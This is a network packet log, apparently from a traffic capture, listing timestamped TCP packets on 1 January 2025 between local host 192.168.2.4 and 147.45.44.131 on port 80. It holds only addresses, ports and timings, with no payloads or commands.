Jan 1, 2025 08:54:02.098800898 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.098922014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.098934889 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.098968983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099087954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099097967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099108934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099118948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099129915 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099140882 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099152088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099164009 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099164009 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099193096 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099193096 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099510908 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099523067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099533081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099544048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099555016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099565029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099580050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099587917 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099587917 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099591970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099603891 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099616051 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099622011 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099654913 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099654913 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099853992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099864960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099881887 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099900007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099910021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099917889 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099920988 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099931955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099941969 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099941969 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.099952936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099965096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.099975109 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.100009918 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.100009918 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.100501060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100512981 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100523949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100541115 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100549936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100559950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100570917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100580931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100590944 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100600004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100610971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100620031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100630045 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100640059 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100651026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100661039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.100737095 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.101246119 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101258039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101269007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101279020 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101289034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101299047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101310015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101319075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101329088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101340055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101350069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101360083 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101371050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101382017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101389885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.101392984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101403952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101414919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101421118 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.101421118 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.101428986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.101469994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.101469994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.102125883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102137089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102147102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102164030 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102169037 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.102174044 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102185965 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102195978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102206945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102219105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.102219105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.102221012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102231979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102241993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102252007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102261066 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.102262974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102274895 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102286100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102286100 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.102297068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102307081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102315903 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.102317095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102329016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102339029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.102364063 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.102364063 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.103096008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103107929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103116989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103121996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103127956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103137970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103151083 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103161097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103167057 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.103172064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103183985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103193998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103203058 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103214025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103219986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.103224039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103235006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103245974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103255987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103260994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.103260994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.103266954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103280067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.103363991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.133507013 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.192806005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.192843914 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.192853928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.192924976 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.192939997 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.192951918 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.192961931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.192992926 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.192992926 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193027973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193038940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193121910 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193123102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193135977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193188906 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193257093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193268061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193279028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193289995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193300962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193325043 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193325043 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193399906 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193412066 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193473101 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193480968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193491936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193500996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193511009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193521976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193535089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193542004 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193542004 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193572044 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193752050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193763018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193773985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193784952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193794966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193800926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193805933 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.193850040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.193890095 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194086075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194096088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194108009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194123983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194135904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194147110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194152117 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194159985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194180012 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194216967 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194389105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194401026 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194410086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194421053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194432020 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194441080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194447994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194448948 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194453001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194478989 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194511890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194514036 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194524050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194535017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194545984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194555998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194566965 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194576979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194583893 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194583893 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194587946 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194601059 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.194626093 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.194665909 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.195256948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195269108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195278883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195300102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195302963 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.195317030 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195327997 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195337057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195342064 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.195346117 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195358038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195369005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195374012 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.195374012 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.195415974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195420027 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.195429087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195439100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195449114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195460081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195466042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.195470095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195482969 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195493937 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195497990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195503950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195508957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.195512056 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.195512056 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.195565939 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196175098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196187019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196197033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196208000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196218014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196228981 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196238995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196249008 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196249962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196260929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196271896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196278095 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196283102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196294069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196299076 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196305990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196336031 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196357965 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196471930 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196657896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196670055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196702957 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196810961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196824074 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196834087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196844101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196861029 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196861029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196861029 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196873903 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196886063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196896076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196907043 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196918011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196928024 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196930885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196938992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196948051 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196949005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196962118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196968079 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196973085 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196984053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.196990967 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.196996927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197005987 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.197010040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197113991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.197741985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197753906 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197765112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197782040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197793961 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197794914 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.197810888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197814941 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.197828054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197839022 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197849989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.197866917 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.197866917 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.197904110 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.283828974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.283860922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.283871889 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.283926010 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.283977985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.283989906 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.283999920 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284010887 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284039974 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284039974 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284141064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284152031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284162045 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284172058 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284202099 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284214973 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284277916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284291029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284337044 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284432888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284444094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284455061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284465075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284476995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284482956 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284486055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284496069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284507036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284508944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284522057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:02.284547091 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284547091 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:02.284574032 CET	49730	80	192.168.2.4	147.45.44.131
